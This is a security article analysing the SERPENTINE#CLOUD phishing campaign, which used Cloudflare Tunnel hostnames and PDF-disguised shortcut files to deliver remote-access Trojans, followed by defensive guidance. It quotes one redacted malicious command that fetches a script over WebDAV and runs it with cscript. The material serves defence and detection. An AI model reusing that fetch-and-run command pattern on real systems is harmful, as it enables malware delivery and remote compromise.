Outdated Drivers Are Slowing You Down
One free scan finds every outdated or missing driver and matches the right update for your exact hardware.Free scan · exact hardware matchWindows Errors? Fix Them Before They Spread
Repair common Windows errors and clear accumulated junk for a smoother, more stable PC - no reinstall needed.Free scan · no reinstallSome links on this page are affiliate links: if you buy through them we may earn a commission, at no extra cost to you.
A phishing campaign documented by Securonix in June 2025 used temporary Cloudflare Tunnel addresses to stage a multi-step Windows infection. Victims were lured by invoice-themed messages to ZIP archives containing PDF-looking Windows shortcut files. Opening a shortcut launched scripts and downloads that ultimately delivered a remote-access Trojan (RAT). The campaign did not show Cloudflare being compromised or a firewall being technically defeated: it exploited permitted outbound web traffic and trusted shared infrastructure, exposing the limits of relying on IP and domain reputation alone.
What happened in the SERPENTINE#CLOUD campaign
Securonix named the operation SERPENTINE#CLOUD and published its analysis on June 18, 2025. The lures commonly referred to invoices or payments, and the available evidence points to broad organizational targeting rather than one confirmed industry or victim set. Securonix reported telemetry from the United States, United Kingdom, Germany and other locations in Europe and Asia. It did not establish a victim count, identify the operators, or confirm nation-state sponsorship. Securonix’s technical analysis is the primary account of the chain.
The important distinction is that Cloudflare’s service was abused as infrastructure; the research does not indicate Cloudflare itself was breached or knowingly involved. Nor does the 2025 reporting establish that this exact operation remains active in 2026. The campaign is best understood as a documented example of a broader tactic: hiding malicious delivery among legitimate, encrypted traffic to widely used services.
The infection chain, from email to RAT
- A business-themed email points to an archive. Rather than simply attaching a program, the message linked to a ZIP file. That extra step can complicate controls that inspect conventional attachments but do not deeply examine linked archives and their contents.
- The archive contains a shortcut disguised as a PDF. A Windows
.lnkfile used a document-like name and icon. It is not a passive document: opening it runs the command embedded in the shortcut. A familiar-looking icon is not proof of file type. - The shortcut starts a command shell and retrieves a script over WebDAV. Securonix shared this representative, redacted command:
cmd.exe /c robocopy "\[redacted].trycloudflare[.]com@SSLDavWWWRootRE_02WSF" %temp% tank.wsf /ns /nc /nfl /ndl >nul & start /min "" cscript.exe //nologo "%temp%tank.wsf"
In this example, robocopy copies a Windows Script File (.wsf) from a WebDAV path into the temporary directory, then cscript.exe runs it. The command also illustrates useful behavioral clues: a shortcut leading to cmd.exe, WebDAV access to DavWWWRoot, script execution from a user-writable temporary location, and minimized execution with output suppressed.
#1 Best Overall
- The script fetches further stages. The WSF loader retrieved a batch file through another temporary Cloudflare Tunnel endpoint. Using multiple disposable hostnames makes a single-domain block less durable.
- An obfuscated batch stage checks the environment and starts Python components. Securonix described character substitution, dynamically reconstructed commands and encoded infrastructure, as well as security-software checks, decoy-PDF behavior and Startup-folder persistence. The value for defenders lies in the sequence of behaviors, not in expecting one fixed script or filename.
- A Python loader decrypts and runs code in memory. The final payload had a strong signature match to Donut, an open-source framework for in-memory loading of PE or .NET assemblies. The resulting activity was consistent with a RAT; analyzed samples included or resembled AsyncRAT and RevengeRAT.
- Files in the Startup folder support persistence. Reported examples included
pws1.vbs,PWS.vbsandstartuppp.bat. Securonix also noted execution from unusual user-profile paths, including aContactsdirectory. Treat these as campaign-specific hunting leads, not mandatory indicators of every variant.
A RAT can provide remote access and may enable credential or browser-data theft, data exfiltration, persistence and follow-on activity. The research described these capabilities, but did not report subsequent hands-on operator actions for every analyzed infection. The later payload execution was substantially memory-resident, but the chain was not wholly “fileless”: it used a shortcut, scripts and persistence files.
Why use Cloudflare Tunnel?
Cloudflare Tunnel is a legitimate way to connect a service to Cloudflare without opening an inbound port to the origin. Its connector makes outbound connections to Cloudflare. A Quick Tunnel can expose a local web server under a randomly generated trycloudflare.com hostname; Cloudflare describes this feature as intended for testing and development, not production. That convenience also gives an attacker a quick way to make staged content reachable without setting up conventional hosting.
Rank #2
This architecture helps explain the headline, but “sneak malware past firewalls” needs qualification. The campaign did not demonstrate an attacker breaking through a properly configured firewall. A perimeter device commonly permits outbound HTTPS, and traffic to a large shared provider can look less suspicious than a connection to a known-bad server. If the connection is encrypted and the organization lacks relevant proxy, DNS, TLS-inspection or endpoint telemetry, the network layer may reveal a destination without revealing the delivered content.
That is a visibility and policy problem, not proof that HTTPS or Cloudflare makes a chain undetectable. Email sandboxing can inspect archives and links; web controls can apply domain and URL policy; Windows controls can limit scripts and shortcut execution; and EDR can observe process lineage, file creation, persistence and suspicious memory behavior. TLS inspection may add useful visibility where it is appropriate, but it is not a standalone answer and can have privacy, compatibility and performance trade-offs.
Rank #3
Blocking every Cloudflare address is usually impractical because the provider serves legitimate sites, applications and APIs. Blocking *.trycloudflare.com can be a sensible policy for ordinary user networks if there is no business need, but may disrupt developer or testing workflows. A controlled exception for approved segments is more workable than a blanket network-wide prohibition. Cloudflare Tunnel’s outbound-only design is useful for legitimate access models; it does not make every use of a tunnel benign.
Defenses that address the whole chain
Email and archive handling
- Inspect or detonate externally sourced ZIP archives, including nested contents and files such as
.lnk,.url,.wsf,.vbs,.bat,.cmdand.ps1. Set policy according to actual business requirements rather than assuming an archive is safe because it was linked, not attached. - Rewrite or sandbox links that lead to file downloads, and treat invoice or payment messages leading to executable content as higher risk.
- Where the workflow permits, block or warn on shortcut files delivered from external email. Ensure reporting routes are simple so staff can submit suspicious messages rather than forwarding them around.
Dedicated email-security products can add URL and attachment analysis, sandboxing and behavioral protections. For example, Proofpoint’s email-protection offering describes gateway and API deployment options and phishing and attachment protections. It is one commercial option, not a guarantee against this chain; organizations should verify how their chosen configuration handles nested archives, shortcuts and download links. The reviewed product page did not publish a price.
Rank #4
Windows execution controls
- Show file extensions in Explorer and train users that a PDF-like icon does not establish that a file is a PDF.
- Use application control, such as AppLocker or Windows Defender Application Control where appropriate, to restrict unauthorized scripts and interpreters. Constrain Windows Script Host if business needs allow.
- Monitor or restrict relationships among
explorer.exe,cmd.exe,robocopy.exe,cscript.exe/wscript.exeandpython.exe. Pay particular attention when scripts or Python run from%TEMP%or unusual profile paths. - Use centrally managed Python installations rather than arbitrary copies in user-writable directories. Monitor changes to user Startup folders and apply attack-surface-reduction policies compatible with the organization’s Windows edition and management stack.
DNS, proxy and endpoint detections
Prefer correlated signals to a brittle list of one-off domains. Useful alerts include user endpoints resolving *.trycloudflare.com; WebDAV over HTTPS from ordinary workstations; a recently opened shortcut spawning a shell; robocopy accessing DavWWWRoot; a script interpreter running a newly downloaded WSF or VBS; Python launched from an unusual location; and new Startup-folder files. Correlate those events with the user, process tree, destination, file type and timing.
Free tools Windows power users keep installed
One-click scans. No signup required.
Where policy and privacy rules permit, retain DNS query names and proxy URL metadata, and consider TLS inspection for managed devices. Restrict WebDAV from user workstations if it is not needed, and separate developer testing from general-user networks. A SIEM or XDR platform can help correlate email, endpoint, DNS and proxy records, but it needs telemetry, detection engineering and an operational response team; it is not a substitute for controls at the point of execution.
The original report also supplied historical domains, an IP address and file-path leads. Such indicators can be useful for retrospective hunting, but tunnel hostnames and campaign infrastructure may be temporary. Validate threat-intelligence indicators before blocking or treating them as current evidence. Securonix’s June 2025 intelligence summary highlights monitoring anomalous tunnel and WebDAV use, unexpected shortcut execution, and VBScript, batch and Python process chains.
Independent reader supportYour contribution helps us test, update, and keep practical guides available for everyone.If a user opened the shortcut
- Isolate the endpoint from the network using your incident-response procedure while preserving available evidence.
- Keep the original email, link, ZIP and shortcut. Collect EDR process trees, DNS and proxy records, and Windows script or Sysmon logs if available.
- Hunt for tunnel-domain lookups, WebDAV access, script and Python execution, Startup-folder changes, and related process or file activity on other endpoints.
- If credential or session theft is possible, reset affected credentials and revoke browser sessions or tokens as your identity-response process allows.
- Remediate or reimage according to policy, then report malicious infrastructure to relevant providers and security vendors. Temporary tunnel endpoints may already have disappeared.
What defenders should take away
SERPENTINE#CLOUD relied on a user opening a disguised shortcut; it was not described as a drive-by exploit. That creates several opportunities to stop the chain before a RAT runs. The practical lesson is not to distrust every connection to Cloudflare, nor to assume a firewall or EDR has failed whenever a tunnel is involved. It is to combine careful archive and link inspection with restrictions on risky execution, visibility into WebDAV and script activity, and behavioral detection across endpoints and network records.
No one product category addresses every stage. Organizations should first audit controls they already own—especially email link and attachment protection, Windows application control, endpoint telemetry and DNS/proxy logging—then fill the gaps. Commercial email security, managed EDR/MDR or SIEM/XDR may help, depending on size and staff capacity; each needs appropriate configuration and response processes. Awareness training can reinforce safe handling and out-of-band payment verification, but it should supplement technical defenses rather than make employees the final security boundary.
Quick Recap
Product prices and availability are accurate as of the date/time indicated and are subject to change. Any price and availability information displayed on Amazon at the time of purchase will apply.

